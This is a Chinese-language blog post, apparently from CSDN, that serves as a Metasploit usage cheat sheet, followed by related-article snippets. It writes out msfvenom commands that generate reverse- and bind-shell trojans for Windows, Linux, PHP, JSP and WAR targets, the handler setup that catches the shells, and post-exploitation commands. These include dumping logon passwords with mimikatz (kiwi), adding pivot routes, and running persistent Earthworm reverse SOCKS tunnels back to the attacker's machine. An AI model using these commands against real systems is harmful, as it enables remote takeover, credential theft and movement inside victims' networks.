MSF-使用备忘录

最新推荐文章于 2022-11-03 11:12:12 发布
最新推荐文章于 2022-11-03 11:12:12 发布
阅读量503 收藏 5
点赞数
文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50643984/article/details/123209862
版权

一.使用msf生成各种类型payload

1.生成win的exe木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe

2.生成linux的可执行文件

msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f elf >/root/muma.elf

注:其中windows和linux后面都可以跟/x86和/x64 (x86是32位,x64是64位)

3.生成php文件的payload

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f raw > shell.php

4.生成jsp文件的payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f raw > shell.jsp

5.生成war文件的payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f war > shell.war

注:1.reverse_tcp为反向木马,受害机来主动连接我们kali攻击机,可以绕过防火墙
2.但是目标如果不出网或者在内网中就得使用正向木马(bind_tcp),因为受害机找不到我们kali攻击机

msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe

二.使用msfconsole来连接木马
1.首先启动msfconsole

root@kali:~# msfconsole

2.使用exploit/multi/handler

msf6 > use exploit/multi/handler
msf6 > show option
msf6 >set payload windows/meterpreter/reverse_tcp
msf6 >set lhost 192.168.1.10
msf6 >set lport 4433
msf6 >run

然后受害机执行木马就可以返回shll了

三.meterpre后渗透模块
1.

meterpreter>ipconfig
meterpreter>ps #查看进程
meterpreter>getuid #查看权限
meterpreter>migrate #迁移进程防止session掉线
meterpreter>load kiwi #导入mimikatz
meterpreter>kiwi_cmd privilege::debug   #提取权限
meterpreter>kiwi_cmd sekurlsa::logonPasswords      #获取密码

读取密码以后就可以进行内网渗透了
可以在msf本身开启代理,先添加路由

meterpreter > run post/multi/manage/autoroute 
meterpreter >run autoroute -p #查看全部路由

可以选择直接在msf里开启socks4代理,msf本身的socks5有bug,不好用

个人建议选择第二种,上传Earthworm (EW)代理,先在kali执行
1.

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

2.在目标机器执行

./ew_for_linux64 -s rssocks -d 192.168.1.10 -e 1234

在后台执行,即使shell掉了也执行

nohup ./ew_for_linux64 -s rssocks -d 192.168.1.10 -e 1234 &

192.168.1.10为kali的ip
3.在kali修改proxychains4配置

vim /etc/proxychains4.conf

修改成一下配置

接下来可以执行代理全局shell,kali执行

root@kali:~# proxychains4 bash #开启全局shell

可以在这个shell里面执行nmap等命令

javelin266桑桑
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msfvenom生成木马的简单利用
weixin_43966088的博客
09-20 2010
msfvenom生成木马的简单利用 kali
msf上制作简单的windows exe木马
最新发布
weixin_73942557的博客
10-25 752
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
MSF生成木马及木马的简单使用
爱喝水的仙人树的博客
11-03 8829
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msf生成payload并注入到可执行程序exe
redwand的博客
07-22 5111
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
kali学习4——使用msfvenom制作exe木马
不会心跳的博客
01-29 5602
使用msfvenom制作exe木马文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木马 msfvenom制作木马需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
MSF --Windows系统后门之exe文件
Kevin's Blog
04-28 1875
文章目录一、环境二、操作2.1 攻击者操作2.2 受害者操作 以下所有的内容仅供网安学习参考,非法攻击他人计算机应后果给予法律制裁!!! 一、环境 Windows 2008 R2(虚拟机,受害者,192.168.7.131) Kali(虚拟机,攻击者,192.168.7.129) 二、操作 2.1 攻击者操作 目的:给windows账户留个后门,这里未提供免杀操作 》》前提MSF能够...
php-msf-demo
04-29
PHP-MSF DEMOPHP微服务框架即“”示例项目How to ...php server.phpNoticephp-msf-demo示例项目使用的是最新的代码,即dev-master分支,生产环境请使用release的相关版本。在有些环境中执行php server.php,由于inot
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
MSF-FRONTEND
03-19
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行该应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒...
ADGG-LSF-MSF-v1.0:ADGG-LSF-MSF-v1.0
02-18
建立React材料UI Redux 草稿JS ChartJS 棱镜JS React降价React完整日历快速开始安装依赖项: npm install或yarn 启动服务器: npm run start或yarn start 视图处于打开状态: localhost:3000 推荐最新的...LSF-MSF-v1.0
利用msf生成后门拿shell
热门推荐
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3343
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
MSF生成后门汇总
干铮的博客
10-10 4737
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器
weixin_39805387的博客
12-06 299
一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好...
MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 1868
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
msf下的各种生成payload命令
qk的专栏
12-21 1万+
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
MSF 生成静态免杀shell(win)
嘻嘻哈哈
01-26 2622
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
msf攻击载荷生成
我还在的博客
10-06 1633
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
msf命令 -p 和-f什么意思
05-16
msf 命令是 Metasploit Framework 的命令行工具。其中,-p 选项是指定要使用的 payload,payload 是指用来执行攻击的代码。而 -f 选项是指定输出文件的格式。例如,你可以使用 -f exe 选项将生成的攻击文件保存为可执行文件格式。具体使用方式可以在 msf 命令行中输入 help 命令查看帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值